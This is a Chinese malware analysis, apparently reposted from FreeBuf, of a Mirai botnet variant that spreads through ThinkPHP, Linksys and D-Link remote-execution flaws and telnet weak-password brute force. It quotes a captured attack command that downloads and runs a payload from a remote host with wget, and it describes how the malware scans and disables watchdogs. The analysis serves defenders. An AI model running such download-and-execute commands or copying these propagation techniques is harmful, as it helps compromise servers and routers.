内容简介:12月底,通过安全设备检测到几个不同的IP试图对几个公司内部的网站进行漏洞攻击。通过攻击日志发现攻击IP使用了于2018年12月12日爆出的ThinkPHP远程代码执行漏洞(CNVD-2018-24942),攻击者利用该漏洞,可在未授权的情况下远程执行代码。下图为攻击日志:
*本文原创作者:kczwa1,本文属于FreeBuf原创奖励计划,未经许可禁止转载
一、概述
12月底,通过安全设备检测到几个不同的IP试图对几个公司内部的网站进行漏洞攻击。通过攻击日志发现攻击IP使用了于2018年12月12日爆出的ThinkPHP远程代码执行漏洞(CNVD-2018-24942),攻击者利用该漏洞,可在未授权的情况下远程执行代码。
下图为攻击日志:
攻击者试图在被攻击服务器上执行如下命令:
‘Cd /tmp;wget http://cnc.junoland.xyz/bins/egg.x86;cat egg.x86> lzrd;chmod 777 lzrd;./lzrd ‘
同时从该恶意文件存放网站上还发现了arm,mips,mipsl等不同cpu架构版本的病毒:
获取egg.x86文件后,截止测试时,根据virustotal网站信息,暂无国内安全公司识别该文件为病毒,如下图所示:
此文件应该是Mirari病毒的一种新变种,保留了传统Mirari特征,试图通过最新的thinkphp漏洞来收割一波服务器肉鸡,比起之前的mirari只攻击IOT设备,这个文件的目标范围扩大了不少。
二、病毒分析
由于体力原因,并未分析完所有的功能。
该病毒为了躲避静态分析,并不直接从库函数libc里面调用系统函数,导入表为空:
所有的系统调用都采用int 80h Linux系统 软中断调用组合系统调用号的方式实现,如下图:
注释后的关键结构代码如下:
包含了漏洞扫描模块和结束模块,代码结构与mirai 类似。
listen_43824模块会打开本地网络监听端口43824:
telnet_brute_force模块,扫描随机IP的telnet服务是否打开,telnet服务在路由器等IOT设备上应用较多,目的IP根据系统时间和进程号进行计算生成:
抓取流量包后发现扫描行为如下:
在进行逆向调试时,成功扫描到某IP开放了23端口telnet服务,从返回信息看该IP为一台华为家用路由器,如下图所示:
当扫描到目的IP开放telnet服务后,开始使用弱口令尝试爆破扫描出的telnet服务。在内存中发现病毒自带的一份弱口令密码表,如图下图所示,这个样本采用少量的密码字典,因为大范围的扫描公网IP字典少扫描效率相对较高,同时由于攻击目标为IOT的Telnet服务,这个服务经常用一些很简单的密码:
Linksys_exp模块会扫描随机IP的8080服务是否打开,目的IP根据系统时间和进程号进行计算生成,如图所示:
下图为通过抓取网络数据发现的对随机IP进行的8080端口扫描行为:
当扫描到IP开放后则使用漏洞CNVD-2014-01260(Linksys多款路由器 tmUnblock.cgi ttcp_ip 参数远程命令执行漏洞)进行攻击,根据payload内容如果此漏洞攻击成功则会在目标路由器上下载egg.mpsl(此病毒的mpsl版本)并执行,攻击payload如下:
攻击流量数据如下:
thinkphp_exp模块,跟前面的进程一样进行任意IP端口扫描,发现端口打开后,尝试使用CNVD-2018-24942(ThinkPHP远程代码执行漏洞)进行攻击:
dir_exp模块,跟前面的进程一样进行任意IP端口扫描, 发现端口打开后,尝试使用CNVD-2013-09199 (DIR-300, DIR-600, DIR-645, DIR-845和DIR-865UPnP SOAP接口接口不正确过滤XML参数,允许远程攻击者利用漏洞注入和执行任意命令)进行攻击:
Watchdog_scan模块,由于IOT设备中经常配置看门狗模块以使机器在出现问题时重启,病毒进程在设备重启后将无法启动,因此子进程5尝试在文件系统中打开名为/dev/watchdog,etc/watchdog等的文件,一旦打开成功则篡改其权限让watchdog失效:
*本文原创作者:kczwa1,本文属于FreeBuf原创奖励计划,未经许可禁止转载
以上所述就是小编给大家介绍的《利用Thinkphp漏洞传播的Mirari新变种分析》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:- GCC 7.3 发布,包含变种 Spectre 漏洞补丁
- LLVM 5.0.2 发布,缓解 Spectre 变种漏洞
- Satan勒索软件出现新变种:利用更多新漏洞
- 警惕“侠盗”团伙利用新型漏洞传播GandCrab勒索“蓝屏”变种
- 警惕“侠盗”团伙利用新型漏洞传播GandCrab勒索“蓝屏”变种
- 攻防最前线:Mirai新变种可利用13个已知漏洞
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
算法分析导论
(美)Robert Sedgewick、(法)Philippe Flajolet / 冯舜玺、李学武、裴伟东、等其他 / 机械工业出版社 / 2006-4 / 38.00元
本书阐述了用于算法数学分析的主要方法,所涉及的材料来自经典数学课题,包括离散数学、初等实分析、组合数学,以及来自经典的计算机科学课题,包括算法和数据结构,本书内容集中覆盖基础、重要和有趣的算法,前面侧重数学,后面集中讨论算法分析的应用,重点的算法分的的数学方法。每章包含大量习题以及参考文献,使读者可以更深入地理解书中的内容。 本书适合作为高等院校数学、计算机科学以及相关专业的本科生和研究生的......一起来看看 《算法分析导论》 这本书的介绍吧!